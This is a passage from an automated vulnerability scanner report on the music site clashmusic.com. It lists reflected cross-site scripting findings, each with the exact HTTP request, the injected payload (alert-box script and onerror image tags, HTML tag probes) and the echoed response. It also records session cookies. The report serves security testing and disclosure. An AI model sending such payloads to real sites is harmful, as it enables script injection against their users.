User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=tjdmale1ipd1kabf4v5e0t4923; expires=Wed, 01-Jun-2011 17:36:28 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:03:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 67994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page-news news sufjan-stevens-suffered-nervous-breakdown903eb"><img src=a onerror=alert(1)>18c5063c5f6 sufjan-stevens-suffered-nervous-breakdown903eb">
...[SNIP]...
3.92. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 8894e--><img%20src%3da%20onerror%3dalert(1)>b663ab7f7e8 was submitted in the REST URL parameter 2. This input was echoed as 8894e--><img src=a onerror=alert(1)>b663ab7f7e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown8894e--><img%20src%3da%20onerror%3dalert(1)>b663ab7f7e8 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=uusndr194g17tjf06aubb5lvi3; expires=Wed, 01-Jun-2011 17:36:48 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:03:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 67998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in view view-page-news news sufjan-stevens-suffered-nervous-breakdown8894e--><img src=a onerror=alert(1)>b663ab7f7e8 sufjan-stevens-suffered-nervous-breakdown8894e-->
...[SNIP]...
3.93. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2264"><a>e81bc81cde1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown?c2264"><a>e81bc81cde1=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=b838s9pkc05rq8dmhsgk95k6a3; expires=Wed, 01-Jun-2011 17:34:20 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:01:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in ntype-news node social-links node 55436 two-sidebars" id="page-news-sufjan-stevens-suffered-nervous-breakdown?c2264"><a>e81bc81cde1=1">
...[SNIP]...
3.94. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bbab"><script>alert(1)</script>e0199fca83b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown?9bbab"><script>alert(1)</script>e0199fca83b=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:47 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; expires=Wed, 01-Jun-2011 17:35:07 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:01:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab"><script>alert(1)</script>e0199fca83b=1&amp;send=false&amp;layout=button_count&amp;width=100&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=21" scrolling="no" frameborder="0" style="border:none; overf
...[SNIP]...
3.95. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1090"><a>da9ed195247 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitesa1090"><a>da9ed195247/all/themes/clash/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:04:54 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:04:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sitesa1090"><a>da9ed195247-all-themes-clash-favicon.ico">
...[SNIP]...
3.96. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f977"><a>af5a1119a31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all6f977"><a>af5a1119a31/themes/clash/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:07:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all6f977"><a>af5a1119a31-themes-clash-favicon.ico">
...[SNIP]...
3.97. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3415b"><a>260dbcb4f32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/themes3415b"><a>260dbcb4f32/clash/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all-themes3415b"><a>260dbcb4f32-clash-favicon.ico">
...[SNIP]...
3.98. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46042"><a>a2bcbcb7296 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/themes/clash46042"><a>a2bcbcb7296/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:12 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all-themes-clash46042"><a>a2bcbcb7296-favicon.ico">
...[SNIP]...
3.99. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92e1"><a>ddaf3efe544 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/themes/clash/favicon.icob92e1"><a>ddaf3efe544 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all-themes-clash-favicon.icob92e1"><a>ddaf3efe544">
...[SNIP]...
3.100. http://www.clashmusic.com/user/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a92"><a>dbba4fc9041 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user35a92"><a>dbba4fc9041/a HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:14:29 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-user35a92"><a>dbba4fc9041-a">
...[SNIP]...
3.101. http://www.clashmusic.com/user/a [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 937e6--><img%20src%3da%20onerror%3dalert(1)>b86330b2446 was submitted in the REST URL parameter 2. This input was echoed as 937e6--><img src=a onerror=alert(1)>b86330b2446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user/a937e6--><img%20src%3da%20onerror%3dalert(1)>b86330b2446 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:14:57 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in user a937e6--><img src=a onerror=alert(1)>b86330b2446 a937e6-->
...[SNIP]...
3.102. http://www.clashmusic.com/user/a [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e86a9"><img%20src%3da%20onerror%3dalert(1)>af52281002d was submitted in the REST URL parameter 2. This input was echoed as e86a9"><img src=a onerror=alert(1)>af52281002d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user/ae86a9"><img%20src%3da%20onerror%3dalert(1)>af52281002d HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:14:47 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user ae86a9"><img src=a onerror=alert(1)>af52281002d ae86a9">
...[SNIP]...
3.103. http://www.clashmusic.com/user/a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2cf1"><a>6d69f2fc0a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/a?f2cf1"><a>6d69f2fc0a7=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:14:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29973

